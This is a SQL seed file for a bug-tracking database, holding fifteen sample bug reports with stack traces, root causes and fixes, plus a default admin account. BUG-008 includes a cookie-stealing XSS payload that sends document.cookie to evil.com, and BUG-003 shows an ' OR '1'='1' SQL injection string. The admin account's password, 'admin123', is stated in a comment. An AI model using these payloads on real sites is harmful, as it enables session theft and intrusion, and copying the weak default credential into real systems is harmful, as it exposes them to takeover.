-- Seed data for Smart Bug Analyzer Database

INSERT OR IGNORE INTO bugs (id, bug_code, title, description, stack_trace, category, severity, priority, status, root_cause, resolution, date_submitted, date_resolved) VALUES
(1, 'BUG-001', 'NullPointerException in UserService.getProfile()', 
 'Application crashes when trying to view a user profile that has been recently deleted. The getProfile method does not check for null before accessing user properties.',
 'java.lang.NullPointerException\n    at com.app.service.UserService.getProfile(UserService.java:142)\n    at com.app.controller.UserController.showProfile(UserController.java:85)\n    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\n    at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:897)\n    at javax.servlet.http.HttpServlet.service(HttpServlet.java:750)',
 'Backend', 'Critical', 'P1', 'Resolved',
 'Missing null check in UserService.getProfile() when user record is deleted but cached reference still exists.',
 'Added null check before accessing user properties. Implemented cache invalidation on user deletion. Added unit test for deleted user profile access.',
 '2026-06-15', '2026-06-16'),

(2, 'BUG-002', 'Memory leak in WebSocket connection handler',
 'Server memory usage increases continuously over time. After 48 hours of operation, the application becomes unresponsive and needs to be restarted.',
 'java.lang.OutOfMemoryError: Java heap space\n    at java.util.Arrays.copyOf(Arrays.java:3210)\n    at java.util.ArrayList.grow(ArrayList.java:265)\n    at com.app.websocket.ConnectionManager.addConnection(ConnectionManager.java:67)\n    at com.app.websocket.WebSocketHandler.afterConnectionEstablished(WebSocketHandler.java:34)',
 'Backend', 'Critical', 'P1', 'Resolved',
 'WebSocket connections are added to the connection pool but never removed on disconnect. The ArrayList grows indefinitely.',
 'Implemented proper connection cleanup in afterConnectionClosed(). Added a scheduled task to purge stale connections every 30 minutes. Added monitoring for connection pool size.',
 '2026-06-20', '2026-06-22'),

(3, 'BUG-003', 'SQL Injection vulnerability in search endpoint',
 'The search API endpoint directly concatenates user input into SQL queries without parameterization, allowing potential SQL injection attacks.',
 'org.springframework.jdbc.BadSqlGrammarException: PreparedStatementCallback; \nbad SQL grammar [SELECT * FROM products WHERE name LIKE ''%'' OR ''1''=''1''--%']\n    at org.springframework.jdbc.support.SQLErrorCodeSQLExceptionTranslator.doTranslate(SQLErrorCodeSQLExceptionTranslator.java:239)\n    at com.app.repository.ProductRepository.searchProducts(ProductRepository.java:56)\n    at com.app.service.SearchService.search(SearchService.java:31)',
 'Security', 'Critical', 'P1', 'Resolved',
 'User input is directly concatenated into SQL query string in ProductRepository.searchProducts() without using parameterized queries.',
 'Replaced string concatenation with PreparedStatement parameters. Added input validation and sanitization layer. Implemented SQL injection detection in WAF rules.',
 '2026-06-25', '2026-06-25'),

(4, 'BUG-004', 'Race condition in order processing',
 'When two users place an order for the last item in stock simultaneously, both orders are accepted, resulting in negative inventory counts.',
 'java.lang.IllegalStateException: Inventory count cannot be negative\n    at com.app.service.InventoryService.decrementStock(InventoryService.java:89)\n    at com.app.service.OrderService.processOrder(OrderService.java:156)\n    at com.app.controller.OrderController.placeOrder(OrderController.java:43)\n    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)',
 'Backend', 'High', 'P1', 'Resolved',
 'The check-then-act sequence in OrderService.processOrder() is not atomic. Multiple threads can read the same inventory count before either decrements it.',
 'Implemented optimistic locking using @Version annotation on Inventory entity. Added database-level constraint to prevent negative stock. Used SELECT FOR UPDATE in critical inventory queries.',
 '2026-07-01', '2026-07-03'),

(5, 'BUG-005', 'CSS layout breaks on Safari mobile',
 'The main navigation menu overlaps with the content area on Safari iOS. The flexbox layout doesn''t render correctly on Safari versions below 15.',
 'Console Error:\n[Warning] CSS property ''gap'' is not supported in this browser version.\nLayout calculated incorrectly for .nav-container with display: flex.\nElement .main-content has computed top: 0px (expected: 64px).\nViewport: 375x812, Safari/604.1',
 'Frontend', 'Medium', 'P2', 'Resolved',
 'The CSS ''gap'' property for flexbox is not supported in Safari versions below 14.1. The nav-container relies on ''gap'' for spacing, causing layout collapse.',
 'Replaced ''gap'' property with margin-based spacing for flexbox containers. Added -webkit- prefixed properties where needed. Added Safari-specific CSS fallbacks using @supports queries.',
 '2026-07-05', '2026-07-06'),

(6, 'BUG-006', 'Authentication token not refreshed after expiry',
 'Users are suddenly logged out after exactly 1 hour of inactivity. The JWT refresh token mechanism is not working properly.',
 'Error: Token expired\n    at AuthService.validateToken (auth-service.js:45)\n    at AuthMiddleware.authenticate (auth-middleware.js:23)\n    at Router.handle (router.js:178)\n    at app.use (app.js:12)\nResponse: 401 Unauthorized\nHeaders: { "X-Token-Expired": "true", "X-Token-Age": "3600" }',
 'Authentication', 'High', 'P2', 'Resolved',
 'The token refresh interceptor only triggers on 403 responses, but the server returns 401 for expired tokens. The refresh logic never executes.',
 'Updated the HTTP interceptor to handle both 401 and 403 responses for token refresh. Added proactive token refresh 5 minutes before expiry. Implemented silent refresh using refresh token rotation.',
 '2026-07-08', '2026-07-09'),

(7, 'BUG-007', 'Database connection pool exhaustion under load',
 'During peak traffic hours, the application starts throwing ''Cannot acquire connection from pool'' errors. All database connections appear to be in use.',
 'com.zaxxer.hikari.pool.HikariPool$PoolEntryCreator - Connection not available, request timed out after 30000ms.\n    at com.zaxxer.hikari.pool.HikariPool.getConnection(HikariPool.java:195)\n    at com.app.repository.BaseRepository.getConnection(BaseRepository.java:34)\n    at com.app.service.ReportService.generateReport(ReportService.java:78)\nActive connections: 50/50, Pending: 127, Idle: 0',
 'Database', 'Critical', 'P1', 'Resolved',
 'The ReportService.generateReport() method opens a database connection but fails to close it in the finally block when an exception occurs during report generation.',
 'Wrapped all database operations in try-with-resources blocks. Increased connection pool size from 50 to 100. Added connection leak detection with 60-second threshold. Added monitoring alerts for pool utilization above 80%.',
 '2026-07-10', '2026-07-11'),

(8, 'BUG-008', 'XSS vulnerability in comment rendering',
 'User-submitted comments containing HTML/JavaScript are rendered without sanitization, allowing cross-site scripting attacks.',
 'Security Scan Report:\nVulnerability: Reflected XSS\nLocation: /api/comments/render\nPayload: <script>document.location=''http://evil.com/steal?c=''+document.cookie</script>\nAffected Component: CommentRenderer.renderHTML()\nRisk Level: HIGH',
 'Security', 'Critical', 'P1', 'Resolved',
 'The CommentRenderer.renderHTML() method uses innerHTML to insert user content without any sanitization or encoding.',
 'Replaced innerHTML with textContent for plain text comments. Implemented DOMPurify for rich text comments. Added Content-Security-Policy headers to prevent inline script execution. Added input validation on the server side.',
 '2026-07-12', '2026-07-12'),

(9, 'BUG-009', 'Infinite re-render loop in React dashboard',
 'The dashboard component re-renders continuously, causing the browser to freeze. CPU usage spikes to 100% when opening the dashboard page.',
 'Warning: Maximum update depth exceeded. This can happen when a component calls setState inside useEffect without a dependency array.\n    at DashboardComponent (Dashboard.jsx:15)\n    at WidgetContainer (WidgetContainer.jsx:8)\n    at AppLayout (AppLayout.jsx:22)\n    at Router (react-router-dom.js:134)\nReact DevTools: 2847 re-renders detected in 3 seconds',
 'Frontend', 'High', 'P1', 'Resolved',
 'The useEffect hook in DashboardComponent has a dependency on an object that is recreated on every render, causing an infinite update loop.',
 'Memoized the dependency object using useMemo(). Added proper dependency arrays to all useEffect hooks. Implemented React.memo() for child widget components to prevent unnecessary re-renders.',
 '2026-07-14', '2026-07-15'),

(10, 'BUG-010', 'File upload fails for files larger than 10MB',
 'When users try to upload files larger than 10MB, the upload silently fails with no error message. The file appears to upload but is never saved.',
 'Error: Request entity too large\n    at PayloadTooLargeError (node_modules/http-errors/index.js:45)\n    at parse (node_modules/body-parser/lib/read.js:102)\n    at multer.single (node_modules/multer/lib/make-middleware.js:51)\n    at uploadController.handleUpload (upload-controller.js:28)\nRequest Headers: Content-Length: 15728640 (15MB)\nServer Config: maxFileSize: 10485760 (10MB)',
 'Backend', 'Medium', 'P2', 'Resolved',
 'The multer middleware has a default file size limit of 10MB. The error is caught by the global error handler but not forwarded to the client as a meaningful response.',
 'Increased file size limit to 50MB in multer configuration. Added client-side file size validation before upload. Implemented proper error response for file size limit exceeded. Added file size display in the upload UI.',
 '2026-07-16', '2026-07-17'),

(11, 'BUG-011', 'Timezone conversion error in scheduling module',
 'Scheduled events created in IST timezone appear 5.5 hours early for users in UTC timezone. The timezone offset is applied in the wrong direction.',
 'Expected: 2026-07-20T14:00:00+05:30 (IST) → 2026-07-20T08:30:00Z (UTC)\nActual:   2026-07-20T14:00:00+05:30 (IST) → 2026-07-20T19:30:00Z (UTC)\nError in: ScheduleService.convertToUTC(localTime, timezone)\nOffset applied: +05:30 instead of -05:30',
 'Backend', 'High', 'P2', 'Resolved',
 'The convertToUTC() function adds the timezone offset instead of subtracting it. The sign of the offset is reversed in the conversion formula.',
 'Fixed the timezone conversion formula to subtract the offset when converting to UTC. Replaced custom timezone handling with the java.time.ZonedDateTime API. Added comprehensive timezone conversion tests for all major timezones.',
 '2026-07-18', '2026-07-19'),

(12, 'BUG-012', 'API rate limiting not working correctly',
 'The rate limiter allows 200 requests per minute instead of the configured 100. Some users are able to bypass rate limiting entirely.',
 'Rate Limiter Debug Log:\n[WARN] Client 192.168.1.45: 200 requests in 60s (limit: 100)\n[ERROR] Rate limit check bypassed for path: /api/v2/*\n[DEBUG] Redis key ''ratelimit:192.168.1.45'' TTL: -1 (no expiry set)\n[DEBUG] Counter increment without TTL reset detected',
 'Security', 'High', 'P2', 'Resolved',
 'The Redis key for rate limiting is created with INCR but the EXPIRE command fails silently when Redis is under load. Also, /api/v2/* paths are excluded from rate limiting due to a misconfigured route matcher.',
 'Used Redis MULTI/EXEC to atomically set the counter and expiry. Fixed the route matcher to include /api/v2/* paths. Added a Lua script for atomic rate limit checking. Added monitoring for rate limiter bypass attempts.',
 '2026-07-20', '2026-07-21'),

(13, 'BUG-013', 'Email notifications sent in wrong language',
 'Users with locale set to ''fr-FR'' are receiving email notifications in English instead of French. The locale preference is not being passed to the email template engine.',
 '[EmailService] Rendering template: order_confirmation\n[EmailService] User locale: fr-FR\n[EmailService] Template locale resolved: en-US (default)\n[TemplateEngine] No locale override provided, using system default\n[EmailService] Email sent to user@example.com with locale: en-US',
 'Backend', 'Low', 'P3', 'Resolved',
 'The EmailService creates the template context without passing the user''s locale preference. The TemplateEngine falls back to the system default locale (en-US).',
 'Updated EmailService to pass user locale to the TemplateEngine context. Added locale validation to ensure only supported languages are used. Created fallback chain: user locale → browser locale → default locale.',
 '2026-07-22', '2026-07-23'),

(14, 'BUG-014', 'Pagination returns duplicate results',
 'When paginating through search results, some items appear on both page 2 and page 3. The total count changes between requests.',
 'Query Debug:\nPage 2: SELECT * FROM items ORDER BY created_at OFFSET 20 LIMIT 10\n  Results: [item-21, item-22, ..., item-30]\nPage 3: SELECT * FROM items ORDER BY created_at OFFSET 30 LIMIT 10\n  Results: [item-29, item-30, item-31, ..., item-38]\nNote: New items inserted between requests shifted the offset',
 'Database', 'Medium', 'P3', 'Resolved',
 'OFFSET-based pagination is unstable when new records are inserted between page requests. New inserts shift the offset positions, causing items to appear on multiple pages.',
 'Replaced OFFSET pagination with cursor-based (keyset) pagination using the last seen item''s ID. Added a stable sort key (id) as secondary sort after created_at. Updated API to return cursor tokens instead of page numbers.',
 '2026-07-24', '2026-07-25'),

(15, 'BUG-015', 'CORS error blocking API calls from mobile app',
 'The mobile app''s web view cannot make API calls to the backend. Browser console shows CORS policy errors for all POST requests.',
 'Access to XMLHttpRequest at ''https://api.example.com/v1/data'' \nfrom origin ''capacitor://localhost'' has been blocked by CORS policy: \nResponse to preflight request doesn''t pass access control check: \nNo ''Access-Control-Allow-Origin'' header is present on the requested resource.\nFailed requests: POST /v1/data, PUT /v1/data/456, DELETE /v1/data/456',
 'Backend', 'High', 'P2', 'Resolved',
 'The CORS configuration only allows ''http://localhost'' and ''https://app.example.com'' origins. The mobile app''s web view uses ''capacitor://localhost'' which is not in the allowed origins list.',
 'Added ''capacitor://localhost'' and ''ionic://localhost'' to the CORS allowed origins. Configured CORS to allow credentials and all necessary headers. Added environment-specific CORS configuration for development, staging, and production.',
 '2026-07-26', '2026-07-26');

-- Seed default user (password: admin123)
INSERT OR IGNORE INTO users (id, email, hashed_password, full_name, role) VALUES
(1, 'admin@example.com', '$2b$12$EixZaYVK1fsbw1ZfbX3OXePaWxn96p36WQoeG6Lruj3vjPGga31lW', 'Admin User', 'admin');
